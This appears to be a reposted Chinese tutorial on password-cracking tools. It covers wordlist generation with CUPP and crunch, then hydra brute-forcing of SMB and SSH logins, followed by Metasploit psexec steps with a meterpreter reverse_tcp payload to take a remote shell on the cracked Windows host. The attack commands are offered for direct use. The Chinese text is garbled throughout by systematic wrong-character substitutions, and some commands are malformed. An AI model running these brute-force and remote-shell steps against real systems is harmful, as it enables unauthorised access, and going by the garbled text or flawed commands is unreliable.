乐趣区

关于程序员:附下载推荐几款暴力破解和字典生成的工具

本文次要设计如下内容
1.CUPP(kali)
2. 亦思社会工程学学点生成器
3. 一句话明码破解工具
4.crunch(kali)
5.hydra(kali)

相干字典和工具可在文末获取百度云下载地址

CUPP(kali)

首先,装置 cupp 软件

apt install -y cupp

新建一个文件夹,用于保留生成的字典

输出 cupp -i 命令开始编辑生成字典

依据本人已知的信息,生成字典。

查看生成的字典 cat san.txt

亦思社会工程学学点生成器

一句话明码破解工具

crunch(kali)

        crunch 是 kali 自带的工具,是一种创立明码字典的工具。依照指定的规定生成明码字典,能够灵便的定制本人的字典文件。

首先,先尝试一个简略的命令。如图所示。1 8 示意明码是 8 位 前面的是明码的范畴,咱们能够看出依照这种形式输入的字典有 23TB。(切记,运行一下立马暂停,否则会卡死)

 查看帮忙

man crunch > crunch.help

命令格局

crunch <min-len> <max-len> [<charset string>]  [options]

参数阐明

min-len         设定最小字符串长度(必选)max-len         设定最大字符串长度(必选)charset string  字符集
options
-b              指定文件输入的大小,防止字典文件过大
-c              指定文件输入的行数,即蕴含明码的个数
-d              限度雷同元素呈现的次数
-e              定义进行字符,即到该字符串就进行生成
-f              调用库文件

特殊字符

%  代表数字
^  代表特殊符号
@  代表小写字母,代表大写字母 

 查看库文件

cat /usr/share/crunch/charset.lst

如图所示,后面显示的名称,前面显示的内容是字符集。这些都是设置好的,咱们也能够自定义写一个字符集。

例子 1:生成 -1- 8 位明码字典,字符集合为小写字母,从 a 开始到 zzzzzzzz 完结

crunch 1 8

 例子 2:生成 1 - 6 位的明码字典,字符集合为 [abcdefg],从 a 开始到 gggggg 完结

crunch 1 6 abcdefg

 例子 3:生成指定字符串,比方生日的日期(% 代表数字)

crunch 8 8 -t 199307%% -e 19930730

例子 4:生成元素的组合,比方 123.com

crunch 7 7 -t %%%.com -s 111.com -e 123.com

 例子 5:在字典中输入特殊字符

crunch 3 3  abc -t @@@ -l @aa

例子 6:以元素组合生成字典 [zhangsan|1993|0701]

crunch 4 4 -p zhangsan 1992 0701

 例子 6:

自定义字符汇合

vim /usr/share/crunch/charset.lst

创立自定义字符汇合

增加一个字符集 

应用自定义字符集生成 [*.com] 字典文件

crunch 5 5 -f /usr/share/crunch/charset.lst test -t @.com

hydra(kali)

首先,先筹备两个文件:罕用的账号和密码文件。这个是我从 github 下载的,账号和明码都有几千条。文章最初,我会将文件下载地址分享一下。

 windows 口令破解

hydra -l ./user.txt -p ./pass.txt smb 192.168.0.110 -vV -f -e nsr
-l    指定一个用户名
-p    指定一个明码
-P    指定明码字典
-L    指定用户名字典
-vV    显示爆破细节
-o    保留爆破后果
-f    找到正确的明码就进行爆破
-e    
    n    null
    s    same
    r    反向
-t    线程 

爆破胜利后,咱们应用 msf 中的 use exploit/windows/smb/psexec 模块去链接。

建设 payload    set payload windows/meterpreter/reverse_tcp

查看须要配置的参数 show options

设置指标主机 set RHOSTS 192.168.0.110

设置账号和明码 set SMBPass xxx    set SMBUser  xxx

run 或者 exploit 进行连贯

linux 口令破解

linux 口令破解,也分为近程破解与本地破解。近程破解次要是爆破 ssh 服务,属于在线明码攻打。本地破解须要拿到 linux 的 shadow 文件,进行 hash 值破解,属于离线明码攻打。

破解 ssh 服务

hydra -l ./user.txt -p ./pass.txt ssh://127.0.0.1-vV -f -t 64

本文由 mdnice 多平台公布

退出移动版